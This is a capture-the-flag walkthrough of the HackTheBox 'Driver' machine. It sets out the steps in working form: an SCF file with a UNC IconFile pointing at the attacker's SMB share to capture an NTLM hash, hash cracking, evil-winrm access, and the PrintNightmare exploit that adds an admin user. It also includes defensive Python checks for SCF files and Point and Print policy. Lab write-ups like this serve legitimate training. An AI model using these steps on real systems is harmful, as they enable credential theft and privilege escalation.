Driver HackTheBox Walkthrough

Introduction

Driver is an easy-rated Windows box on the HackTheBox platform. It is designed to teach initial access using an SCF file, followed by local privilege escalation using PrintNightmare (a printer driver vulnerability). The box covers the fundamentals of enumeration and highlights the importance of attention to detail while pentesting.

 

Table of contents

Initial Access

· Enumeration using Nmap and other tools

· Compromising a low-priv hash using an SCF file

· Evil-WinRM to access the low-priv account

· User flag

Privilege Escalation

· Abusing the printer driver vulnerability

· Root flag

Let’s deep dive into this.

 

Initial Access

The IP address assigned to the machine is 10.129.32.68. Running an Nmap scan against it gives the following result:



We check each port for enumeration and possible further access. Only port 80 seemed to offer a way forward, but the web application was protected by a password.



Knowing the password is essential. The Nmap results show that an MFP printer website is running on this port. Working on the assumption that web interfaces for hardware products generally ship with a default password, we try admin/admin, and it works!



Further, we see there is a firmware update option on the website which accepts a file. We looked into firmware files and how shells could be injected into them for execution, but a far simpler method came up: uploading a Shell Command File (SCF) through the update portal. You can read more about SCF here. Nmap shows that the host is a Windows server, so it can process an SCF file.

We simply created an SMB server and pointed the SCF file's IconFile at it using a UNC path, so that the server connects back to us and we can capture the current user's hash.

cat shell.scf

[Shell]

Command=2

IconFile=\\10.10.14.93\tools\ignite.ico

[Taskbar]

Command=ToggleDesktop

Next, we upload this file in the Firmware Updates section.



Before hitting submit, we launch our SMB server using the impacket tool suite. Upon hitting submit, we see that the Windows server processed the file, and we captured the hash of the low-privileged user tony.

smbserver.py tools $(pwd) -smb2support
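From the defender's side, the thing that makes this work is the remote UNC path in IconFile: Explorer resolves it as soon as the folder holding the file is listed, so any place that accepts and stores user-supplied files (like the firmware upload here) is worth screening. The following Python script is an added example written for this walkthrough, not code from the original post or from impacket; it parses SCF content and flags IconFile entries that point at a remote host. The sample inputs are the SCF shown above and a constructed benign one that uses a local icon resource.

```python
"""Flag Shell Command Files (.scf) whose IconFile points at a remote host.

Added defensive illustration for this write-up; it is not code from the
original post. Explorer resolves an SCF's IconFile as soon as the folder
holding the file is rendered, and a UNC target makes the host authenticate
to that share, which is how the hash above was obtained. An upload handler
can apply this check before storing anything, and the same function works
for triaging files already sitting on a share.
"""
import configparser
import re
from typing import Dict, List, Tuple

# A UNC path: two leading backslashes (or forward slashes), a host, a share.
UNC_RE = re.compile(r"^\s*(?:\\\\|//)([^\\/]+)[\\/]([^\\/]+)")


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse SCF text into {section: {option: value}} with lower-cased names.

    SCF is INI-style, so configparser does the work. Interpolation is off
    because values contain backslashes and may contain a literal '%';
    strict is off so a duplicated key does not abort the scan.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str.lower
    parser.read_string(text)
    return {section.lower(): dict(parser.items(section)) for section in parser.sections()}


def remote_icon_targets(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (section, host, share, raw_value) for every IconFile that is a UNC path."""
    findings = []
    for section, options in parse_scf(text).items():
        value = options.get("iconfile")
        if value is None:
            continue
        match = UNC_RE.match(value)
        if match:
            findings.append((section, match.group(1), match.group(2), value.strip()))
    return findings


def is_suspicious_scf(text: str) -> bool:
    """True when any IconFile entry would trigger an outbound SMB connection."""
    return bool(remote_icon_targets(text))


# Sample inputs: the SCF from this write-up, and a constructed benign one
# that points at a local icon resource instead of a share.
WRITEUP_SCF = r"""
[Shell]
Command=2
IconFile=\\10.10.14.93\tools\ignite.ico
[Taskbar]
Command=ToggleDesktop
"""

BENIGN_SCF = r"""
[Shell]
Command=2
IconFile=%SystemRoot%\system32\SHELL32.dll,32
[Taskbar]
Command=ToggleDesktop
"""

if __name__ == "__main__":
    for label, sample in (("write-up", WRITEUP_SCF), ("benign", BENIGN_SCF)):
        hits = remote_icon_targets(sample)
        if hits:
            for section, host, share, raw in hits:
                print(f"{label}: [{section}] IconFile -> \\\\{host}\\{share} ({raw})")
        else:
            print(f"{label}: no remote IconFile")
```

The host and share captured by the check are exactly what an egress rule or an alert would key on; blocking outbound TCP 445 from servers to the internet stops this class of forced authentication even when a file slips through.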



We save this hash into a file and run John the Ripper against it with the rockyou dictionary file. The cracked password is "liltony".



Next, we tried using SMB tools to get a shell on the server, but that did not work. Nmap showed WinRM running, so we tried evil-winrm to access tony's account. You can install evil-winrm using gem. Then we read user.txt on the Desktop.

gem install evil-winrm

evil-winrm -i 10.129.32.68 -u tony -p liltony

cd ..\Desktop

cat user.txt



 

Privilege Escalation

To enumerate further for privilege escalation, we use winPEASx64.exe, which we can download using wget.

wget https://github.com/carlospolop/peass-ng/releases/download/20221006/winpeasx64.exe



We use the upload feature in evil-winrm to put this file on the target and then run it.

upload /root/winpeasx64.exe

.\winpeasx64.exe



Among the findings, we see that a PowerShell history file (ConsoleHost_history.txt) was saved and is readable.



Reading it, we see that a printer driver for the RICOH PCL6 printer was added.



Reading more about the driver, we found that it is vulnerable to PrintNightmare (CVE-2021-34527). You can read more about it here. So, we download the PowerShell exploit created by John Hammond.

wget https://raw.githubusercontent.com/johnhammond/cve-2021-34527/master/cve-2021-34527.ps1



This exploit works by creating a new DLL, adding an admin account on the box and then removing traces. So we upload the exploit to the box using evil-winrm and create our own admin account, aarti/Ignite@123987.

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Import-Module .\CVE-2021-34527.ps1

Invoke-Nightmare -NewUser "aarti" -NewPassword "Ignite@123987"
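On the mitigation side, Microsoft's fix for CVE-2021-34527 relies on the Point and Print policy values under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint, and hosts that never print can stop the Spooler service altogether. The script below is an added example for this walkthrough, not part of the original post or of the exploit author's code: it evaluates those values against the hardened configuration, reads them from the registry when run on a Windows host, and reports whether the Spooler is running. The registry path and value names are Microsoft's; the function names are my own.

```python
r"""Audit the Point and Print policy values behind the PrintNightmare mitigation.

Added defensive illustration for this write-up; it is not code from the
original post or from the exploit author. Microsoft's hardening for
CVE-2021-34527 is driven by three DWORD values under
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint.
evaluate_point_and_print() is a pure function over a dict of those values
(None meaning "not set") so the logic can be exercised on any platform;
read_point_and_print() fills the dict from the registry on Windows, and
spooler_running() reports whether the service is up at all.
"""
import subprocess
import sys
from typing import Dict, List, Optional

POINT_AND_PRINT_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
VALUE_NAMES = (
    "RestrictDriverInstallationToAdministrators",
    "NoWarningNoElevationOnInstall",
    "UpdatePromptSettings",
)


def evaluate_point_and_print(values: Dict[str, Optional[int]]) -> List[str]:
    """Return findings for weak Point and Print settings; empty means hardened.

    Hardened configuration per Microsoft's guidance:
      RestrictDriverInstallationToAdministrators = 1
      NoWarningNoElevationOnInstall              = 0 (or absent)
      UpdatePromptSettings                        = 0 (or absent)
    """
    findings = []
    restrict = values.get("RestrictDriverInstallationToAdministrators")
    if restrict == 0:
        findings.append(
            "RestrictDriverInstallationToAdministrators=0: non-administrators may "
            "install printer drivers, the path PrintNightmare abuses")
    elif restrict is None:
        findings.append(
            "RestrictDriverInstallationToAdministrators not set: relying on the OS "
            "default instead of an explicit policy")
    if values.get("NoWarningNoElevationOnInstall") == 1:
        findings.append(
            "NoWarningNoElevationOnInstall=1: driver installs skip the warning and "
            "elevation prompt")
    prompt = values.get("UpdatePromptSettings")
    if prompt not in (None, 0):
        findings.append(
            f"UpdatePromptSettings={prompt}: driver updates skip the warning or "
            "elevation prompt")
    return findings


def read_point_and_print() -> Dict[str, Optional[int]]:
    """Read the three policy values from HKLM (Windows only)."""
    import winreg  # standard library, but only present on Windows

    values: Dict[str, Optional[int]] = {name: None for name in VALUE_NAMES}
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POINT_AND_PRINT_KEY)
    except FileNotFoundError:
        return values  # key absent: nothing is explicitly configured
    with key:
        for name in VALUE_NAMES:
            try:
                data, _ = winreg.QueryValueEx(key, name)
                values[name] = int(data)
            except FileNotFoundError:
                pass  # this particular value is not set
    return values


def spooler_running() -> bool:
    """True when the Print Spooler service reports RUNNING (Windows only)."""
    out = subprocess.run(["sc", "query", "Spooler"], capture_output=True, text=True)
    return "RUNNING" in out.stdout


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("the registry audit must run on the Windows host being checked")
    report = evaluate_point_and_print(read_point_and_print())
    for line in report or ["Point and Print policy is hardened"]:
        print(line)
    print("Print Spooler running:", spooler_running())
```

Run it on the box after the patch to see the values move to the hardened state; on an unpatched host the first finding is the one that matters, since driver installation by a standard user is the step the exploit above depends on.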



We can confirm the exploit worked by checking that the new user exists on the server with the net user command.

net user

net user aarti



Finally, we use evil-winrm again to connect to the machine as the new user and grab the root flag.

evil-winrm -i 10.129.32.68 -u aarti -p Ignite@123987

cd c:\users\administrator\desktop

cat root.txt


Conclusion

The Driver box on the HackTheBox platform is a good beginner-friendly Windows box that teaches the basics of exploitation via a server-side file execution vulnerability, followed by privilege escalation using a very well-known printer driver vulnerability. Thanks for reading.
